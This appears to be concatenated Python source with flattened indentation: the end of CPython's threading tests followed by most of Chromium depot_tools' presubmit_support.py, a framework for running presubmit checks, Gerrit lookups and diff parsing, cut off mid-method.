# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
        # function is set up.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "genereator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # A Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
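# A minimal usage sketch for SigintHandler (added for illustration, not part of
# the original flow): subprocess waits are routed through sigint_handler.wait()
# so a Ctrl+C terminates any tracked child. The command below is hypothetical.
def _example_sigint_wait():
  p = subprocess.Popen(['python', '-c', 'print "hi"'],
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                       stdin=subprocess.PIPE)
  # wait() returns (stdout, stderr) and raises ProcessWasInterrupted if a
  # SIGINT was seen in the meantime.
  stdout, _ = sigint_handler.wait(p, None)
  return stdout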
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
    This function converts invocations of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
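# A minimal sketch of how CommandData and ThreadPool fit together, mirroring
# what InputApi.RunTests() does further down in this file. The command and the
# 'run_tests.py' script are hypothetical; _PresubmitError (defined below) is
# used as the message factory, which is what presubmit checks normally pass.
def _example_thread_pool():
  pool = ThreadPool(pool_size=2)
  pool.AddTests([
      CommandData(name='unit tests', cmd=['python', 'run_tests.py'],
                  kwargs={'cwd': '.'}, message=_PresubmitError),
  ])
  # RunAsync() returns the collected result messages; the list is empty when
  # every command exits with status 0.
  return pool.RunAsync()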
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
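# A minimal sketch of PresubmitOutput behaviour (illustrative only): a 'y' on
# the input stream lets a prompt pass, anything else, or a missing input
# stream, counts as a failure. The in-memory streams below are stand-ins.
def _example_presubmit_output():
  out = PresubmitOutput(input_stream=cStringIO.StringIO('y\n'),
                        output_stream=cStringIO.StringIO())
  out.prompt_yes_no('Proceed despite warnings? (y/N) ')
  # should_continue() is True because no error was recorded; getvalue()
  # returns everything written so far (here, just the prompt).
  return out.should_continue(), out.getvalue()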
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
    However, the API isn't very clear about what's inside, so see the tests for examples.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].iteritems():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = labelinfo.get('values', {}).keys()
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
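# A minimal usage sketch for GerritAccessor, assuming a reachable Gerrit host;
# the host name and issue number below are hypothetical.
def _example_gerrit_accessor():
  gerrit = GerritAccessor('chromium-review.googlesource.com')
  description = gerrit.GetChangeDescription(12345)  # current patchset
  approvers = gerrit.GetChangeReviewers(12345, approving_only=True)
  return description, approvers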
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
    # TODO(yyanagisawa): stop exposing this when python3 becomes the default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
    presubmit script. For example, it can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
    and InputApi.DEFAULT_BLACK_LIST are used, respectively.
    The lists will be compiled as regular expressions and
    AffectedFile.LocalPath() needs to pass both lists.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return filter(source_file, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
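# A minimal sketch of how a PRESUBMIT.py check typically drives InputApi: a
# custom source filter fed to RightHandSideLines() for a line-level check,
# plus RunTests() for an external command. The trailing-whitespace check and
# the 'run_pylint.py' command are hypothetical examples, not part of this
# module's API.
def _example_presubmit_check(input_api, output_api):
  def py_sources(affected_file):
    return input_api.FilterSourceFile(affected_file, white_list=(r'.+\.py$',))
  results = []
  for af, line_num, line in input_api.RightHandSideLines(py_sources):
    if line != line.rstrip():
      results.append(output_api.PresubmitPromptWarning(
          '%s:%d has trailing whitespace' % (af.LocalPath(), line_num)))
  # input_api.Command is CommandData; RunTests fills in cwd and runs the
  # command through the ThreadPool defined above.
  results.extend(input_api.RunTests([
      input_api.Command(name='pylint', cmd=['python', 'run_pylint.py'],
                        kwargs={}, message=output_api.PresubmitError),
  ]))
  return results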
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; with git
      # this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
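# A minimal sketch of the file_marker regex used by _GitDiffCache.GetDiff():
# it only matches when the diff header repeats the same path twice, which is
# what the comment in GetDiff assumes GenerateDiff produces. The sample line
# is hypothetical.
def _example_file_marker():
  file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
  match = file_marker.match('diff --git foo/bar.cc foo/bar.cc')
  return match.group('filename')  # 'foo/bar.cc'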
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
    Deleted files are not text files."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
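# A minimal sketch of the hunk-header parsing that AffectedFile.ChangedContents()
# relies on: the capture group is the starting line number of the new
# ("right hand side") hunk. The sample header is hypothetical.
def _example_hunk_header():
  m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', '@@ -10,4 +12,6 @@')
  return int(m.group(1))  # 12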
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
